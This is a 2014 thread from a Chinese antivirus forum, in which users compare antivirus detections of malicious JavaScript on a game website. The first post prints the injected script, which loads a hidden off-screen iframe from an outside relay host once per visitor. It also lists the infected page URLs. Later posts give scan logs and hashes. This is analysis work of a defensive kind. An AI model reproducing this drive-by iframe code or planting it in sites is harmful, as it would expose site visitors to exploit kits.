查看: 3739|回复: 8
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2014-1-23 19:01:01 | 显示全部楼层 |阅读模式
本帖最后由 fireold 于 2014-1-23 19:05 编辑
  1. http://www.prisongames.com/profile_blogs/felrike/%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B
复制代码


  1. function cgjap09() {
  2.      var static = 'ajax';
  3.      var controller = 'index.php';
  4.      var cgjap = document.createElement('iframe');

  5.      cgjap.src = 'http://mybrookingsrealtor.com/relay.php';
  6.      cgjap.style.position = 'absolute';
  7.      cgjap.style.color = '210';
  8.      cgjap.style.height = '210px';
  9.      cgjap.style.width = '210px';
  10.      cgjap.style.left = '1000210';
  11.      cgjap.style.top = '1000210';

  12.      if (!document.getElementById('cgjap')) {
  13.          document.write('<p id=\'cgjap\' class=\'cgjap09\' ></p>');
  14.          document.getElementById('cgjap').appendChild(cgjap);
  15.      }
  16. }

  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.      var today = new Date();
  19.      var expire = new Date();
  20.      if (nDays == null || nDays == 0) nDays = 1;
  21.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  23. }

  24. function GetCookie(name) {
  25.      var start = document.cookie.indexOf(name + "=");
  26.      var len = start + name.length + 1;
  27.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  28.          return null;
  29.      }
  30.      if (start == -1) return null;
  31.      var end = document.cookie.indexOf(";", len);
  32.      if (end == -1) end = document.cookie.length;
  33.      return unescape(document.cookie.substring(len, end));
  34. }
  35. if (navigator.cookieEnabled) {
  36.      if (GetCookie('visited_uq') == 55) {} else {
  37.          SetCookie('visited_uq', '55', '1', '/');

  38.          cgjap09();
  39.      }
  40. }
复制代码



Avira
2014/1/23 下午 06:53 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\ajax_tabs[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '5a5259b5.qua' 名稱底下的隔離區目錄!

2014/1/23 下午 06:53 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\functions[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '42ca762d.qua' 名稱底下的隔離區目錄!

2014/1/23 下午 06:53 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        789
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2014/1/23 下午 06:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\functions[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2014/1/23 下午 06:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\ajax_tabs[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2014/1/23 下午 06:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\functions[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2014/1/23 下午 06:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\ajax_tabs[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2014/1/23 下午 06:52 [Web Protection] 已停用 Web Protection
      服務已停用

2014/1/23 下午 06:51 [Web Protection] 封鎖的網頁
      URL
      (http://www.prisongames.com/profile_blogs/felrike/%26amp%3Bamp%3Bamp%3Bamp%3Bamp
      %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B) 的評估結果為 惡意程式碼,而遭到封鎖.


av.jpg



fs is
fs.jpg
yiren
头像被屏蔽
发表于 2014-1-23 19:06:37 | 显示全部楼层
bg网页.PNG
yiren
头像被屏蔽
发表于 2014-1-23 19:07:34 | 显示全部楼层
fs的网页报跟BG一样,说明什么了咧?
zmzcy
发表于 2014-1-23 22:42:58 | 显示全部楼层
Object: http://www.prisongames.com/js/functions.js
SHA1: 85a3df5bf2582ea2bb47c23555481513a5150cae
Name: Exploit.JS.Expack.G
Object: http://www.prisongames.com/js/ajax_tabs.js
SHA1: 7a76f5b6de8270c71fdf74f510206dbc407e7d77
Name: Exploit.JS.Expack.G
Object: http://www.prisongames.com/profi ... mp;amp;amp;amp;amp;
SHA1: 4cecef31eb287da5eb5e4c088dd44b848f2270e9
Name: Malware-WI.
fireold
 楼主| 发表于 2014-1-24 07:16:19 | 显示全部楼层
yiren 发表于 2014-1-23 19:07
fs的网页报跟BG一样,说明什么了咧?

bd竟然沒報…

bd.jpg
yiren
头像被屏蔽
发表于 2014-1-24 11:09:42 | 显示全部楼层
fireold 发表于 2014-1-24 07:16
bd竟然沒報…

我这里今天入了BG的恶意网址库,但是继续进入,跟你一样,没有报。估计网站后台处理了。
275751198
发表于 2014-1-24 11:28:24 | 显示全部楼层
我想知道js下到本地有什么用?
aeonhuang
发表于 2014-1-24 16:01:01 | 显示全部楼层
被ASC拦截,被FSCS清理
20140124155935.jpg

z紫f风l铃
发表于 2014-1-25 22:17:12 | 显示全部楼层
GD自己的引擎报,BD引擎没报
QQ图片20140125221615.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 17:45 , Processed in 0.140169 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表